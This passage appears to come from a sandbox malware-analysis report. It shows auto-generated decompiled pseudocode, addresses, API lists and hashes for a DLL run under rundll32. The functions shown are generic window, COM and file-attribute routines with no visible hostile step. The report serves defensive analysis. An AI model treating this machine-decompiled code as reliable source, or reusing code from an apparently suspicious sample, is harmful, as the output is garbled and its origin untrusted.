							return E1001FC9C(E1001B91E( *((intOrPtr*)(_t168 - 0x18))));
						} else {
							 *((intOrPtr*)(_t168 - 0x10)) = 0;
							if( *((intOrPtr*)(_t166 + 0x10)) <= 0) {
								L31:
								__imp__CoTaskMemFree( *((intOrPtr*)(_t166 + 0x14)));
								goto L32;
							}
							_t163 = 0;
							do {
								_t101 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24)) + 4));
								 *((intOrPtr*)(_t168 - 0x14)) = _t101;
								if(_t101 == 0) {
									goto L28;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((intOrPtr*)( *((intOrPtr*)(E1000911A(_t168 - 0x14))) + 0x98)) = 0;
								} while ( *((intOrPtr*)(_t168 - 0x14)) != 0);
								L28:
								E1001B823( *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24)));
								_t145 =  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24));
								if(_t145 != 0) {
									 *((intOrPtr*)( *_t145 + 4))(1);
								}
								 *((intOrPtr*)(_t168 - 0x10)) =  *((intOrPtr*)(_t168 - 0x10)) + 1;
								_t163 = _t163 + 0x28;
							} while ( *((intOrPtr*)(_t168 - 0x10)) <  *((intOrPtr*)(_t166 + 0x10)));
							goto L31;
						}
					}
					_t164 = 0;
					if( *((intOrPtr*)(_t166 + 0x38)) <= 0) {
						L17:
						if(_t180 != 0) {
							_push( *((intOrPtr*)(_t166 + 0x3c)));
							E10004D75(0, _t164, _t166, _t180);
							_push( *((intOrPtr*)(_t166 + 0x40)));
							E10004D75(0, _t164, _t166, _t180);
						}
						goto L19;
					}
					 *((intOrPtr*)(_t168 - 0x10)) = 0;
					do {
						__imp__#9( *((intOrPtr*)(_t166 + 0x40)) +  *((intOrPtr*)(_t168 - 0x10)));
						 *((intOrPtr*)(_t168 - 0x10)) =  *((intOrPtr*)(_t168 - 0x10)) + 0x10;
						_t164 = _t164 + 1;
					} while (_t164 <  *((intOrPtr*)(_t166 + 0x38)));
					_t180 =  *((intOrPtr*)(_t166 + 0x38));
					goto L17;
				}
				_t121 =  *((intOrPtr*)(__ecx + 0x50));
				if(_t121 == 0) {
					goto L11;
				}
				_t122 =  *_t121;
				_push(_t168 - 0x14);
				_push(0x1003b37c);
				_push(_t122);
				if( *((intOrPtr*)( *_t122))() < 0) {
					goto L11;
				}
				_t124 =  *((intOrPtr*)(_t168 - 0x14));
				if(_t124 == 0) {
					goto L11;
				}
				_push(_t168 - 0x10);
				_push(0x1003b4bc);
				 *((intOrPtr*)(_t168 - 0x10)) = 0;
				_push(_t124);
				if( *((intOrPtr*)( *_t124 + 0x10))() >= 0) {
					_t128 =  *((intOrPtr*)(_t168 - 0x10));
					if(_t128 != 0) {
						 *((intOrPtr*)( *_t128 + 0x18))(_t128,  *((intOrPtr*)(__ecx + 0x58)));
						_t130 =  *((intOrPtr*)(_t168 - 0x10));
						 *((intOrPtr*)( *_t130 + 8))(_t130);
					}
				}
				_t126 =  *((intOrPtr*)(_t168 - 0x14));
				 *((intOrPtr*)( *_t126 + 8))(_t126);
				goto L11;
			}

























                                                                                                            0x10019c50
                                                                                                            0x10019c57
                                                                                                            0x10019c5c
                                                                                                            0x10019c5e
                                                                                                            0x10019c61
                                                                                                            0x10019c6c
                                                                                                            0x10019c6f
                                                                                                            0x00000000
                                                                                                            0x10019cf5
                                                                                                            0x10019cd4
                                                                                                            0x10019cd7
                                                                                                            0x10019cd9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019cdb
                                                                                                            0x10019cdd
                                                                                                            0x10019cdf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019ce7
                                                                                                            0x10019cef
                                                                                                            0x10019cef
                                                                                                            0x10019cfd
                                                                                                            0x10019d00
                                                                                                            0x10019d08
                                                                                                            0x10019d42
                                                                                                            0x10019d42
                                                                                                            0x10019d47
                                                                                                            0x10019d4c
                                                                                                            0x10019d4c
                                                                                                            0x10019d4f
                                                                                                            0x10019d54
                                                                                                            0x10019d59
                                                                                                            0x10019d59
                                                                                                            0x10019d5f
                                                                                                            0x10019dce
                                                                                                            0x10019dce
                                                                                                            0x10019dd3
                                                                                                            0x10019dd6
                                                                                                            0x10019dd6
                                                                                                            0x10019ddc
                                                                                                            0x10019de1
                                                                                                            0x10019de8
                                                                                                            0x10019df0
                                                                                                            0x10019df0
                                                                                                            0x10019df5
                                                                                                            0x10019df8
                                                                                                            0x10019dfa
                                                                                                            0x10019dfe
                                                                                                            0x10019e03
                                                                                                            0x10019e04
                                                                                                            0x10019e09
                                                                                                            0x10019e0a
                                                                                                            0x10019e0d
                                                                                                            0x10019e0f
                                                                                                            0x10019e13
                                                                                                            0x10019e18
                                                                                                            0x10019e19
                                                                                                            0x10019e1e
                                                                                                            0x10019e1f
                                                                                                            0x10019e24
                                                                                                            0x10019e29
                                                                                                            0x10019e29
                                                                                                            0x10019e2c
                                                                                                            0x10019e31
                                                                                                            0x10019e36
                                                                                                            0x10019e36
                                                                                                            0x10019e3c
                                                                                                            0x10019e4a
                                                                                                            0x10019d61
                                                                                                            0x10019d64
                                                                                                            0x10019d67
                                                                                                            0x10019dc5
                                                                                                            0x10019dc8
                                                                                                            0x00000000
                                                                                                            0x10019dc8
                                                                                                            0x10019d69
                                                                                                            0x10019d6b
                                                                                                            0x10019d72
                                                                                                            0x10019d77
                                                                                                            0x10019d7a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019d7c
                                                                                                            0x10019d7c
                                                                                                            0x10019d91
                                                                                                            0x10019d91
                                                                                                            0x10019d99
                                                                                                            0x10019da0
                                                                                                            0x10019da8
                                                                                                            0x10019dae
                                                                                                            0x10019db4
                                                                                                            0x10019db4
                                                                                                            0x10019db7
                                                                                                            0x10019dbd
                                                                                                            0x10019dc0
                                                                                                            0x00000000
                                                                                                            0x10019d6b
                                                                                                            0x10019d5f
                                                                                                            0x10019d0a
                                                                                                            0x10019d0f
                                                                                                            0x10019d2e
                                                                                                            0x10019d2e
                                                                                                            0x10019d30
                                                                                                            0x10019d33
                                                                                                            0x10019d38
                                                                                                            0x10019d3b
                                                                                                            0x10019d41
                                                                                                            0x00000000
                                                                                                            0x10019d2e
                                                                                                            0x10019d11
                                                                                                            0x10019d14
                                                                                                            0x10019d1b
                                                                                                            0x10019d21
                                                                                                            0x10019d25
                                                                                                            0x10019d26
                                                                                                            0x10019d2b
                                                                                                            0x00000000
                                                                                                            0x10019d2b
                                                                                                            0x10019c75
                                                                                                            0x10019c7a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019c7c
                                                                                                            0x10019c83
                                                                                                            0x10019c84
                                                                                                            0x10019c89
                                                                                                            0x10019c8e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019c90
                                                                                                            0x10019c95
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019c9a
                                                                                                            0x10019c9b
                                                                                                            0x10019ca0
                                                                                                            0x10019ca5
                                                                                                            0x10019cab
                                                                                                            0x10019cad
                                                                                                            0x10019cb2
                                                                                                            0x10019cba
                                                                                                            0x10019cbd
                                                                                                            0x10019cc3
                                                                                                            0x10019cc3
                                                                                                            0x10019cb2
                                                                                                            0x10019cc6
                                                                                                            0x10019ccc
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 10019C57
                                                                                                            • VariantClear.OLEAUT32(?), ref: 10019D1B
                                                                                                            • CoTaskMemFree.OLE32(?,00000010), ref: 10019DC8
                                                                                                            • CoTaskMemFree.OLE32(?,00000010), ref: 10019DD6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeTask$ClearH_prolog3Variant
                                                                                                            • String ID:
                                                                                                            • API String ID: 365290523-0
                                                                                                            • Opcode ID: cd38f89cae56ad47c5dcbd5386d246e758d2adde0798c45e4cdf38565e7e9628
                                                                                                            • Instruction ID: f4ca11870bf7736933ae268dd06283376a7c22ef50caea19de43a80b2043cb75
                                                                                                            • Opcode Fuzzy Hash: cd38f89cae56ad47c5dcbd5386d246e758d2adde0798c45e4cdf38565e7e9628
                                                                                                            • Instruction Fuzzy Hash: C6711475A00A42DFCB60CFA8C9C586AB7F6FF48304762486DE5469BA61CB31FD81CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001987A Relevance: 6.2, APIs: 4, Instructions: 173windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 34%
                                                                                                            			E1001987A(signed int __ecx, void* __edx) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				char _v76;
				intOrPtr _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t63;
				signed int _t64;
				intOrPtr _t70;
				signed int _t72;
				signed int _t73;
				signed int _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t84;
				signed int _t86;
				signed int _t88;
				signed int _t92;
				intOrPtr* _t99;
				signed int _t100;
				signed int _t126;
				intOrPtr _t127;
				void* _t144;
				void* _t147;
				intOrPtr* _t148;
				signed int** _t150;
				signed int* _t151;
				signed int _t154;
				signed int _t156;
				void* _t158;
				void* _t161;

				_t144 = __edx;
				_t126 = __ecx;
				_t158 = _t161;
				_t154 = __ecx;
				_t63 =  *((intOrPtr*)(__ecx + 4));
				_push(_t147);
				if(_t63 != 0) {
					_t64 =  *(_t63 + 0x28);
					__eflags = _t64;
					if(_t64 == 0) {
						goto L4;
					} else {
						_t126 = _t64;
						_t72 = E1000BBDF(0, _t126, _t147);
						__eflags = _t72;
						_v8 = _t72;
						if(_t72 == 0) {
							goto L4;
						} else {
							_t73 = IsWindowVisible( *(_t72 + 0x20));
							asm("sbb eax, eax");
							_t75 =  ~_t73 + 1;
							__eflags = _t75;
							_v24 = _t75;
							if(_t75 != 0) {
								GetWindowRect( *(E1000A8F0(0, _t126, _t158, GetDesktopWindow()) + 0x20),  &_v56);
								GetWindowRect( *(_v8 + 0x20),  &_v40);
								asm("cdq");
								asm("cdq");
								__eflags = _v56.right - _v56.left - _t144;
								E1000EF54(_v8, _v56.right - _v56.left - _t144 >> 1, _v56.bottom - _v56.top - _t144 >> 1, 0, 0, 0);
								E1000EF92(_v8, 1);
							}
							_t77 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
							_t148 = _t154 + 0x48;
							_t78 =  *((intOrPtr*)( *_t77))(_t77, 0x100388c0, _t148);
							__eflags = _t78;
							if(_t78 < 0) {
								_t80 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
								_t81 =  *((intOrPtr*)( *_t80))(_t80, 0x10038918,  &_v16);
								__eflags = _t81;
								if(_t81 >= 0) {
									_t82 = _v16;
									 *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v20);
									_t84 = _v16;
									 *((intOrPtr*)( *_t84 + 8))(_t84);
									_t86 = _v20;
									__eflags = _t86;
									if(_t86 != 0) {
										_t150 = _t154 + 8;
										_v12 =  *((intOrPtr*)( *_t86))(_t86, 0x1003b17c, _t150);
										_t88 = _v20;
										 *((intOrPtr*)( *_t88 + 8))(_t88);
										_t81 = _v12;
										__eflags = _t81;
										if(__eflags >= 0) {
											_t151 =  *_t150;
											 *( *_t151)(_t151, 0x1003b16c, _t154 + 0xc);
											goto L21;
										}
									} else {
										_t81 = 0x80004005;
									}
								}
							} else {
								_t99 =  *_t148;
								_t151 = _t154 + 0x4c;
								_t100 =  *((intOrPtr*)( *_t99 + 0xc))(_t99, 0, 0x1003b40c, _t151);
								__eflags =  *_t151;
								_v12 = _t100;
								if( *_t151 == 0) {
									_v12 = 0x80004003;
								}
								__eflags = _v12;
								if(__eflags >= 0) {
									L21:
									_t92 = E10018DA4(0, _t154, _t151, _t154, __eflags);
									__eflags = _v24;
									_t156 = _t92;
									if(_v24 != 0) {
										__eflags = _v40.right - _v40.left;
										E1000EF54(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
										E1000EF92(_v8, 0);
									}
									_t81 = _t156;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										__eflags = _v40.right - _v40.left;
										E1000EF54(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
										E1000EF92(_v8, 0);
									}
									_t81 = _v12;
								}
							}
							return _t81;
						}
					}
				} else {
					L4:
					_push(_t158);
					_push(_t126);
					_v76 = 0x10044410;
					E100209E8( &_v76, 0x1003e2dc);
					asm("int3");
					_push(4);
					E1001FBC4(E10032E9B, 0, _t147, _t154);
					_t127 = E100105C8(0x104);
					_v88 = _t127;
					_t70 = 0;
					_v76 = 0;
					if(_t127 != 0) {
						_t70 = E1000E58E(_t127);
					}
					return E1001FC9C(_t70);
				}
			}












































                                                                                                            0x1001987a
                                                                                                            0x1001987a
                                                                                                            0x1001987b
                                                                                                            0x10019882
                                                                                                            0x10019884
                                                                                                            0x1001988b
                                                                                                            0x1001988c
                                                                                                            0x10019893
                                                                                                            0x10019896
                                                                                                            0x10019898
                                                                                                            0x00000000
                                                                                                            0x1001989a
                                                                                                            0x1001989a
                                                                                                            0x1001989c
                                                                                                            0x100198a1
                                                                                                            0x100198a3
                                                                                                            0x100198a6
                                                                                                            0x00000000
                                                                                                            0x100198a8
                                                                                                            0x100198ab
                                                                                                            0x100198b3
                                                                                                            0x100198b5
                                                                                                            0x100198b5
                                                                                                            0x100198b6
                                                                                                            0x100198b9
                                                                                                            0x100198d4
                                                                                                            0x100198e0
                                                                                                            0x100198eb
                                                                                                            0x100198fa
                                                                                                            0x100198fb
                                                                                                            0x10019900
                                                                                                            0x1001990a
                                                                                                            0x1001990a
                                                                                                            0x10019912
                                                                                                            0x10019917
                                                                                                            0x10019921
                                                                                                            0x10019923
                                                                                                            0x10019925
                                                                                                            0x10019986
                                                                                                            0x10019995
                                                                                                            0x10019997
                                                                                                            0x10019999
                                                                                                            0x1001999f
                                                                                                            0x100199a9
                                                                                                            0x100199ac
                                                                                                            0x100199b2
                                                                                                            0x100199b5
                                                                                                            0x100199b8
                                                                                                            0x100199ba
                                                                                                            0x100199c5
                                                                                                            0x100199d1
                                                                                                            0x100199d4
                                                                                                            0x100199da
                                                                                                            0x100199dd
                                                                                                            0x100199e0
                                                                                                            0x100199e2
                                                                                                            0x100199e4
                                                                                                            0x100199f2
                                                                                                            0x00000000
                                                                                                            0x100199f2
                                                                                                            0x100199bc
                                                                                                            0x100199bc
                                                                                                            0x100199bc
                                                                                                            0x100199ba
                                                                                                            0x10019927
                                                                                                            0x10019927
                                                                                                            0x1001992b
                                                                                                            0x10019936
                                                                                                            0x10019939
                                                                                                            0x1001993b
                                                                                                            0x1001993e
                                                                                                            0x10019940
                                                                                                            0x10019940
                                                                                                            0x10019947
                                                                                                            0x1001994a
                                                                                                            0x100199f4
                                                                                                            0x100199f6
                                                                                                            0x100199fb
                                                                                                            0x100199fe
                                                                                                            0x10019a00
                                                                                                            0x10019a10
                                                                                                            0x10019a1a
                                                                                                            0x10019a23
                                                                                                            0x10019a23
                                                                                                            0x10019a28
                                                                                                            0x10019950
                                                                                                            0x10019950
                                                                                                            0x10019953
                                                                                                            0x10019963
                                                                                                            0x1001996d
                                                                                                            0x10019976
                                                                                                            0x10019976
                                                                                                            0x1001997b
                                                                                                            0x1001997b
                                                                                                            0x1001994a
                                                                                                            0x10019a2e
                                                                                                            0x10019a2e
                                                                                                            0x100198a6
                                                                                                            0x1001988e
                                                                                                            0x1001988e
                                                                                                            0x10004e6e
                                                                                                            0x10004e71
                                                                                                            0x10004e7b
                                                                                                            0x10004e82
                                                                                                            0x10004e87
                                                                                                            0x10004e88
                                                                                                            0x10004e8f
                                                                                                            0x10004e9e
                                                                                                            0x10004ea0
                                                                                                            0x10004ea3
                                                                                                            0x10004ea7
                                                                                                            0x10004eaa
                                                                                                            0x10004eac
                                                                                                            0x10004eac
                                                                                                            0x10004eb6
                                                                                                            0x10004eb6

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Rect$DesktopVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 1055025324-0
                                                                                                            • Opcode ID: ef76f55fcefd2cae7d74b9455366248ca8dbe27d5b7ca6cb76258884cb09bc7f
                                                                                                            • Instruction ID: 8de48d2105652726057613f2335e895d96fc1fae9d5598094c6c5e62d9502a62
                                                                                                            • Opcode Fuzzy Hash: ef76f55fcefd2cae7d74b9455366248ca8dbe27d5b7ca6cb76258884cb09bc7f
                                                                                                            • Instruction Fuzzy Hash: F751F975A0010AAFDB04DFA8CD84CAEB7B9FF49344B114468F605EB265DB30EE41CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001C6EB Relevance: 6.1, APIs: 4, Instructions: 132timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1001C6EB(void* __ecx, void* __eflags, signed int* _a4) {
				char _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t52;
				long _t56;
				signed int* _t75;
				signed int* _t78;
				signed int* _t81;
				struct _FILETIME* _t88;
				void* _t100;
				CHAR* _t101;
				signed int* _t102;
				void* _t103;
				void* _t107;

				_t85 = __ecx;
				_t102 = _a4;
				_t100 = __ecx;
				E10020F40(__ecx, _t102, 0, 0x128);
				E10004EB7(0, _t85, _t100, _t102, _t103,  &(_t102[8]), 0x104,  *(_t100 + 0xc), 0xffffffff);
				_t52 =  *(_t100 + 4);
				_t107 = _t52 -  *0x100384f0; // 0xffffffff
				if(_t107 == 0) {
					L21:
					return 1;
				}
				_t88 =  &_v12;
				if(GetFileTime(_t52, _t88,  &_v20,  &_v28) != 0) {
					_t56 = GetFileSize( *(_t100 + 4), 0);
					_t102[6] = _t56;
					_t102[7] = 0;
					if(_t56 != 0xffffffff || 0 != 0) {
						_t101 =  *(_t100 + 0xc);
						if( *((intOrPtr*)(_t101 - 0xc)) != 0) {
							_t102[8] = (_t88 & 0xffffff00 | GetFileAttributesA(_t101) == 0xffffffff) - 0x00000001 & _t57;
						} else {
							_t102[8] = 0;
						}
						if(E1001C573( &_v12) == 0) {
							 *_t102 = 0;
							_t102[1] = 0;
						} else {
							_t81 = E1001C68D( &_v36,  &_v12, 0xffffffff);
							 *_t102 =  *_t81;
							_t102[1] = _t81[1];
						}
						if(E1001C573( &_v20) == 0) {
							_t102[4] = 0;
							_t102[5] = 0;
						} else {
							_t78 = E1001C68D( &_v36,  &_v20, 0xffffffff);
							_t102[4] =  *_t78;
							_t102[5] = _t78[1];
						}
						if(E1001C573( &_v28) == 0) {
							_t102[2] = 0;
							_t102[3] = 0;
						} else {
							_t75 = E1001C68D( &_v36,  &_v28, 0xffffffff);
							_t102[2] =  *_t75;
							_t102[3] = _t75[1];
						}
						if(( *_t102 | _t102[1]) == 0) {
							 *_t102 = _t102[2];
							_t102[1] = _t102[3];
						}
						if((_t102[4] | _t102[5]) == 0) {
							_t102[4] = _t102[2];
							_t102[5] = _t102[3];
						}
						goto L21;
					} else {
						goto L2;
					}
				}
				L2:
				return 0;
			}






















                                                                                                            0x1001c6eb
                                                                                                            0x1001c6f3
                                                                                                            0x1001c700
                                                                                                            0x1001c702
                                                                                                            0x1001c715
                                                                                                            0x1001c71a
                                                                                                            0x1001c720
                                                                                                            0x1001c726
                                                                                                            0x1001c83a
                                                                                                            0x00000000
                                                                                                            0x1001c83c
                                                                                                            0x1001c734
                                                                                                            0x1001c741
                                                                                                            0x1001c74e
                                                                                                            0x1001c757
                                                                                                            0x1001c75a
                                                                                                            0x1001c75d
                                                                                                            0x1001c763
                                                                                                            0x1001c769
                                                                                                            0x1001c781
                                                                                                            0x1001c76b
                                                                                                            0x1001c76b
                                                                                                            0x1001c76b
                                                                                                            0x1001c78f
                                                                                                            0x1001c7ab
                                                                                                            0x1001c7ad
                                                                                                            0x1001c791
                                                                                                            0x1001c79a
                                                                                                            0x1001c7a1
                                                                                                            0x1001c7a6
                                                                                                            0x1001c7a6
                                                                                                            0x1001c7bb
                                                                                                            0x1001c7dc
                                                                                                            0x1001c7df
                                                                                                            0x1001c7bd
                                                                                                            0x1001c7c6
                                                                                                            0x1001c7cd
                                                                                                            0x1001c7d3
                                                                                                            0x1001c7d3
                                                                                                            0x1001c7ed
                                                                                                            0x1001c80e
                                                                                                            0x1001c811
                                                                                                            0x1001c7ef
                                                                                                            0x1001c7f8
                                                                                                            0x1001c7ff
                                                                                                            0x1001c805
                                                                                                            0x1001c805
                                                                                                            0x1001c819
                                                                                                            0x1001c81e
                                                                                                            0x1001c823
                                                                                                            0x1001c823
                                                                                                            0x1001c82c
                                                                                                            0x1001c831
                                                                                                            0x1001c837
                                                                                                            0x1001c837
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c75d
                                                                                                            0x1001c743
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • _memset.LIBCMT ref: 1001C702
                                                                                                              • Part of subcall function 10004EB7: _wctomb_s.LIBCMT ref: 10004EC7
                                                                                                            • GetFileTime.KERNEL32(?,?,?,?), ref: 1001C739
                                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 1001C74E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$SizeTime_memset_wctomb_s
                                                                                                            • String ID:
                                                                                                            • API String ID: 26245289-0
                                                                                                            • Opcode ID: 849433f6196f86cb5afcb6a6d1b4fa8c1ab3bc4dc122d4181a5b04c53ba76e7d
                                                                                                            • Instruction ID: 51a8328b60633bd59e5f15858ada0f86eee49ce44263773015f9aa20d2328a8a
                                                                                                            • Opcode Fuzzy Hash: 849433f6196f86cb5afcb6a6d1b4fa8c1ab3bc4dc122d4181a5b04c53ba76e7d
                                                                                                            • Instruction Fuzzy Hash: 0B410C759047099FC724CF68C881C9AB7F8FF087607118A2DE5A6DB691E770F984CB64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000F366 Relevance: 6.1, APIs: 4, Instructions: 103windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E1000F366(void* __ecx, struct HWND__** _a4) {
				struct HWND__** _v8;
				struct HWND__** _v12;
				long _t31;
				struct HWND__** _t32;
				struct HWND__** _t44;
				struct HWND__** _t45;
				long _t47;
				void* _t49;
				struct HWND__** _t63;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
					_t31 = _a4;
					if(_t31 != 0) {
						if( *((intOrPtr*)(_t31 + 8)) == 0) {
							L4:
							_t32 = E1001B8D6( *((intOrPtr*)(_t49 + 0x4c)) + 0x40, _t31, 0);
							_v12 = _t32;
							_a4 = _t32;
							E1000911A( &_a4);
							while(_a4 != 0) {
								_t37 =  *((intOrPtr*)(E1000911A( &_a4)));
								_v8 =  *((intOrPtr*)(E1000911A( &_a4)));
								if((E1000F07E(_t37) & 0x00020000) != 0) {
									break;
								} else {
									_t45 = _v8;
									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
										continue;
									} else {
										L16:
										_t44 = _v8;
										goto L17;
									}
								}
								goto L18;
							}
							_a4 = _v12;
							_t31 = E1000F16D( &_a4);
							while(_a4 != 0) {
								_t63 =  *(E1000F16D( &_a4));
								_v8 = _t63;
								if(_t63[2] == 0) {
									L13:
									_t31 = E1000F07E(_t63);
									if((_t31 & 0x00020000) == 0) {
										continue;
									}
								} else {
									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
										goto L16;
									} else {
										_t63 = _v8;
										goto L13;
									}
								}
								goto L18;
							}
						} else {
							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
							_t44 = _a4;
							if(_t47 == 1) {
								L17:
								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
							} else {
								goto L4;
							}
						}
						L18:
					}
				}
				return _t31;
			}












                                                                                                            0x1000f369
                                                                                                            0x1000f36a
                                                                                                            0x1000f36d
                                                                                                            0x1000f374
                                                                                                            0x1000f37a
                                                                                                            0x1000f37f
                                                                                                            0x1000f38f
                                                                                                            0x1000f3a8
                                                                                                            0x1000f3b0
                                                                                                            0x1000f3b8
                                                                                                            0x1000f3bb
                                                                                                            0x1000f3c5
                                                                                                            0x1000f406
                                                                                                            0x1000f3db
                                                                                                            0x1000f3df
                                                                                                            0x1000f3ec
                                                                                                            0x00000000
                                                                                                            0x1000f3ee
                                                                                                            0x1000f3ee
                                                                                                            0x1000f3f4
                                                                                                            0x00000000
                                                                                                            0x1000f461
                                                                                                            0x1000f461
                                                                                                            0x1000f461
                                                                                                            0x00000000
                                                                                                            0x1000f461
                                                                                                            0x1000f3f4
                                                                                                            0x00000000
                                                                                                            0x1000f3ec
                                                                                                            0x1000f411
                                                                                                            0x1000f41b
                                                                                                            0x1000f45a
                                                                                                            0x1000f431
                                                                                                            0x1000f436
                                                                                                            0x1000f439
                                                                                                            0x1000f44e
                                                                                                            0x1000f44e
                                                                                                            0x1000f458
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000f43b
                                                                                                            0x1000f449
                                                                                                            0x00000000
                                                                                                            0x1000f44b
                                                                                                            0x1000f44b
                                                                                                            0x00000000
                                                                                                            0x1000f44b
                                                                                                            0x1000f449
